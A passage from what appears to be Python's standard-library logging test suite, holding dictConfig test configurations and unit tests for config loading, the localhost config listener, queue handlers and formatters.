# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as '()' key and 'validate' set to False
custom_formatter_class_validate = {
'version': 1,
'formatters': {
'form1': {
'()': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as 'class' key and 'validate' set to False
custom_formatter_class_validate2 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom class that is not inherited from logging.Formatter
custom_formatter_class_validate3 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.myCustomFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom function and 'validate' set to False
custom_formatter_with_function = {
'version': 1,
'formatters': {
'form1': {
'()': formatFunc,
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t)
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.assertRaises(ValueError, self.apply_config, self.out_of_order)
def test_out_of_order_with_dollar_style(self):
config = copy.deepcopy(self.out_of_order)
config['formatters']['mySimpleFormatter']['format'] = "${asctime} (${name}) ${levelname}: ${message}"
self.apply_config(config)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_custom_formatter_class_with_validate(self):
self.apply_config(self.custom_formatter_class_validate)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2(self):
self.apply_config(self.custom_formatter_class_validate2)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2_with_wrong_fmt(self):
config = self.custom_formatter_class_validate.copy()
config['formatters']['form1']['style'] = "$"
# Exception should not be raise as we have configured 'validate' to False
self.apply_config(config)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate3(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_class_validate3)
def test_custom_formatter_function_with_validate(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_with_function)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
def test_namedtuple(self):
# see bpo-39142
from collections import namedtuple
class MyHandler(logging.StreamHandler):
def __init__(self, resource, *args, **kwargs):
super().__init__(*args, **kwargs)
self.resource: namedtuple = resource
def emit(self, record):
record.msg += f' {self.resource.type}'
return super().emit(record)
Resource = namedtuple('Resource', ['type', 'labels'])
resource = Resource(type='my_type', labels=['a'])
config = {
'version': 1,
'handlers': {
'myhandler': {
'()': MyHandler,
'resource': resource
}
},
'root': {'level': 'INFO', 'handlers': ['myhandler']},
}
with support.captured_stderr() as stderr:
self.apply_config(config)
logging.info('some log')
self.assertEqual(stderr.getvalue(), 'some log my_type\n')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
# Test that traceback only appends once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def assert_error_message(self, exception, message, *args, **kwargs):
try:
self.assertRaises(exception, *args, **kwargs)
except exception as e:
self.assertEqual(message, e.message)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)#15s')
self.assertTrue(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(ValueError, f.format, r)
f = logging.Formatter("{message}", style='{')
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
def test_dollars(self):
